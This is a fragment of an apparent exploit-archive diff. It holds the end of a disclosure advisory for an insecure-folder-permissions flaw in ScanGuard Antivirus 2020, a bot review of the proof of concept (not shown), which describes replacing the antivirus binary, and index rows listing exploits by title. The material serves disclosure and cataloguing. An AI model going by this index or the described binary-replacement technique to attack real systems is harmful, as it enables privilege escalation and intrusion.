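+Second contact follow up: September 29, 2019
+No more vendor replies.
+November 12, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx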
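Review bot: The return values of `rename(TARGET, DISABLED_TARGET)`, `CopyFile(fname, newLoc, FALSE)` and `MoveFile(...)` are never examined, yet the program prints `[+] Disabled ScanGuard.exe ...` and `[+] Replaced legit ScanGuard...` unconditionally, so on an install whose ACL does not allow the operation — the very condition the advisory is about — the PoC still reports success; each call should be tested and the `GetLastError()` value printed when it fails, e.g. `if (!CopyFile(fname, newLoc, FALSE)) { printf("[-] CopyFile failed: %lu\n", GetLastError()); return; }`. `void main(void)` is not a conforming C signature and `exit(0)` is used without `#include <stdlib.h>`, so the listing depends on the compiler being lenient. The second branch tests `FileExists("ScamGuard.lnk")` relative to the current directory while the file was moved to an absolute path under `Program Files (x86)` a few lines earlier, so that check and the following `DEL` never refer to the same file. The header's `# CVE : N/A` also contradicts the `[CVE Reference] CVE-2019-18895` section further down and should be updated to match.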
|
@ -10770,6 +10770,7 @@ id,file,description,date,author,type,platform,port
|
|||
47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows,
|
||||
47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows,
|
||||
47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path",2019-11-12,chuyreds,local,windows,
|
||||
47656,exploits/windows/local/47656.txt,"ScanGuard Antivirus 2020 - Insecure Folder Permissions",2019-11-13,hyp3rlinx,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -41964,3 +41965,9 @@ id,file,description,date,author,type,platform,port
|
|||
47643,exploits/aspx/webapps/47643.txt,"Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
|
||||
47644,exploits/hardware/webapps/47644.py,"FlexAir Access Control 2.3.35 - Authentication Bypass",2019-11-12,LiquidWorm,webapps,hardware,
|
||||
47648,exploits/hardware/webapps/47648.txt,"Bematech Printer MP-4200 - Denial of Service",2019-11-12,"Jonatas Fil",webapps,hardware,
|
||||
47649,exploits/hardware/webapps/47649.py,"Linear eMerge E3 1.00-06 - Remote Code Execution",2019-11-13,LiquidWorm,webapps,hardware,
|
||||
47650,exploits/php/webapps/47650.txt,"FUDForum 3.0.9 - Remote Code Execution",2019-11-13,liquidsky,webapps,php,
|
||||
47651,exploits/hardware/webapps/47651.txt,"Technicolor TD5130.2 - Remote Command Execution",2019-11-13,"João Teles",webapps,hardware,
|
||||
47652,exploits/hardware/webapps/47652.py,"Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting",2019-11-13,"Luis Santana",webapps,hardware,
|
||||
47653,exploits/php/webapps/47653.txt,"gSOAP 2.8 - Directory Traversal",2019-11-13,"numan türle",webapps,php,
|
||||
47654,exploits/hardware/webapps/47654.py,"Fastweb Fastgate 0.00.81 - Remote Code Execution",2019-11-13,"Riccardo Gasparini",webapps,hardware,
|
||||
|
|